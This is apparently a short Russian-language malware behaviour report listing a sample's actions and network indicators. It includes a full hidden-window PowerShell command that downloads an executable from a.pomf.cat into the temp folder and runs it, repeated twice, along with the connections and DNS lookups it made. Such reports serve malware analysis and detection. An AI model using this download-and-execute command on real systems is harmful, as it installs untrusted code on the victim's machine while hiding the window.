Техническая информация
- https://a.pomf.cat/dgmawn.exe как %temp%\dgmawn.exe
- '<SYSTEM32>\cmd.exe' cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/dgmawn.exe','%TEMP%\dgmawn.exe') & %tmp%\dgmawn.exe
- 'a.##mf.cat':443
- 'a.##mf.cat':443
- DNS ASK a.##mf.cat
- '<SYSTEM32>\cmd.exe' cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/dgmawn.exe','%TEMP%\dgmawn.exe') & %tmp%\dgmawn.exe' (со скрытым окном)